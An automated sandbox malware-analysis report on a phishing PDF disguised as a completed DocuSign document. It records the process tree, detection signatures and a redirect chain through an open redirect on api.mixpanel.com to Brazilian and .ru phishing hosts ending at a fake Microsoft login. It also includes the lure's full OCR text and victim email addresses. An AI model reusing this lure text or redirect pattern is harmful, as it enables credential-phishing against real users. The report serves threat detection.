Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document_31055.pdf

Overview

General Information

Sample name:Document_31055.pdf
Analysis ID:1591161
MD5:e4e62d80c802f58a5bf0cbd1df2b2fe0
SHA1:1dc4a2c01c4d80dbd85c7b368d6e1ff26d04a934
SHA256:6e3322a32a458ff2d9c5f2fbb26aafe5dbb92ad24c06684fdb1304753052379d
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found potential malicious PDF (bad image similarity)
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected use of open redirect vulnerability
Suspicious PDF detected (based on various text indicators)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • Acrobat.exe (PID: 1492 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Document_31055.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 1412 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 384 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1588,i,14734467309998307436,13739961970335841568,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 5376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://api.mixpanel.com/track/?data=eyJldmVudCI6ImUtbWFpbDogW0FjdGlvbiBSZXF1aXJlZF0gUmVjb25uZWN0IEFkV29yZHMsIEZhY2Vib29rIHRvIFJvY2tlcmJveCAtIChjbGljaykiLCJwcm9wZXJ0aWVzIjp7InRva2VuIjoiYTQ4MzY4OTA0MTgzY2Y0MDVkZWI5MDg4MWUxNTRiZDgiLCJkaXN0aW5jdF9pZCI6ImxwcmlzZW5kb3JmQGphbmVpcmVkYWxlLmNvbSIsImxpbmsiOiJodHRwczpcL1wvYXBwLnJvY2tlcmJveC5jb20iLCJjYW1wYWlnbiI6InRyYW5zYWN0aW9uYWwifX0=&redirect=https%3A%2F%2Fmidiacentral.com.br%2Foslksedhlabd%2Fgyu%2Fwio%2Fblip%2Fsepla%2FGina/bWR1bm5AZ2VvaW5zaWdodHMuY29t" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2384,i,12472687294183246176,5245290317952259585,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru/XguRQyGirCoCfFLdTCFAUEEHJYDVUYACVLBCQIPCIRGZZIVMBLDKKAZHACAvira URL Cloud: Label: malware

Phishing

barindex
Source: PDF documentJoe Sandbox AI: Page contains button: 'VIEW COMPLETED DOCUMENT' Source: 'PDF document'
Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'view completed document'
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://l4u8.yaalwgyl.ru/VDb0pu/#kmdunn@geoinsight... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and sends it to an untrusted domain, and it also redirects users to a fake login page. These behaviors are highly indicative of malicious intent, such as phishing or credential theft.
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://l4u8.yaalwgyl.ru/VDb0pu/#kmdunn@geoinsight... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also includes an obfuscated interval function that triggers a redirect after a certain time delay, which is highly suspicious. Overall, this script demonstrates malicious intent and should be considered a high-risk threat.
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://l4u8.yaalwgyl.ru/VDb0pu/#kmdunn@geoinsight... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Proxy from: api.mixpanel.com/track/?data=eyjldmvudci6imutbwfpbdogw0fjdglvbibszxf1axjlzf0gumvjb25uzwn0iefkv29yzhmsiezhy2vib29rihrvifjvy2tlcmjvecatichjbgljaykilcjwcm9wzxj0awvzijp7inrva2vuijoiytq4mzy4ota0mtgzy2y0mdvkzwi5mdg4mwuxntrizdgilcjkaxn0aw5jdf9pzci6imxwcmlzzw5kb3jmqgphbmvpcmvkywxllmnvbsisimxpbmsioijodhrwczpcl1wvyxbwlnjvy2tlcmjvec5jb20ilcjjyw1wywlnbii6inryyw5zywn0aw9uywwifx0=&redirect=https://midiacentral.com.br/oslksedhlabd/gyu/wio/blip/sepla/gina/bwr1bm5az2vvaw5zawdodhmuy29t to https://midiacentral.com.br/oslksedhlabd/gyu/wio/blip/sepla/gina/bwr1bm5az2vvaw5zawdodhmuy29t
Source: Adobe Acrobat PDFOCR Text: Docu Your document has been completed:Mdunn Review And Sign. VIEW COMPLETED DOCUMENT All signers completed Complete with DocuSign: Geoinsights - Pg 2.pdf DocuSign Powered by Do Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others. Alternate Signing Method Visit DocuSign.com, click 'Access Documents', and enter the security code: 2AOC077DF2B545B992E9E741821 D94712 About DocuSign Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- DocuSign provides a professional trusted solution for Digital Transaction Management TM. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. Stop receiving this email Report this email or read more about Declining to sign and Managing notifications. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center. Download the DocuSign_App This message was sent to ##UNAME## who is using the DocuSign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 8028c5f5-4849-4807-a09d-becabb49d1578e8adc63-0c9a-4c72-aa71-947f11b0ef0d
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://l4u8.yaalwgyl.ru/VDb0pu/#kmdunn@geoinsights.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724730971912324.ODAyOGM1ZjUtNDg0OS00ODA3LWEwOWQtYmVjYWJiNDlkMTU3OGU4YWRjNjMtMGM5YS00YzcyLWFhNzEtOTQ3ZjExYjBlZjBk&ui_locales=en-US&mkt=en-US&client-request-id=13d80113-1570-4bcc-b9a9-eeb010610fd4&state=Vl3TGn-7Ui0upagqF5931OK8nkWVjdzrnaxvCSe7M0X0EXtrVuSIn05L8zKRpSD19MzN1ByQHpiXfaga8a_RitBX78Xh72Xzfck5XifMCGQxZiQ7zMwr8KUNu0wwRfHe40yMKtAgVAD2Asgge0QH1LYpxXUUChinrmtVFcaSQADP7Hf8Mi5tVC6Yrci2M00SVshNlF354El8TOqhf10P3_gvYbgW0HNKGGSANulunD2z9xKcAK7OquydI2vnSMosHPcAd3ZrpRtJve9FznIlzw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:56509 version: TLS 1.0
Source: global trafficTCP traffic: 192.168.2.5:63809 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.5:56300 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: api.mixpanel.com to https://midiacentral.com.br/oslksedhlabd/gyu/wio/blip/sepla/gina/bwr1bm5az2vvaw5zawdodhmuy29t
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 104.21.60.111 104.21.60.111
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:56509 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /track/?data=eyJldmVudCI6ImUtbWFpbDogW0FjdGlvbiBSZXF1aXJlZF0gUmVjb25uZWN0IEFkV29yZHMsIEZhY2Vib29rIHRvIFJvY2tlcmJveCAtIChjbGljaykiLCJwcm9wZXJ0aWVzIjp7InRva2VuIjoiYTQ4MzY4OTA0MTgzY2Y0MDVkZWI5MDg4MWUxNTRiZDgiLCJkaXN0aW5jdF9pZCI6ImxwcmlzZW5kb3JmQGphbmVpcmVkYWxlLmNvbSIsImxpbmsiOiJodHRwczpcL1wvYXBwLnJvY2tlcmJveC5jb20iLCJjYW1wYWlnbiI6InRyYW5zYWN0aW9uYWwifX0=&redirect=https%3A%2F%2Fmidiacentral.com.br%2Foslksedhlabd%2Fgyu%2Fwio%2Fblip%2Fsepla%2FGina/bWR1bm5AZ2VvaW5zaWdodHMuY29t HTTP/1.1Host: api.mixpanel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
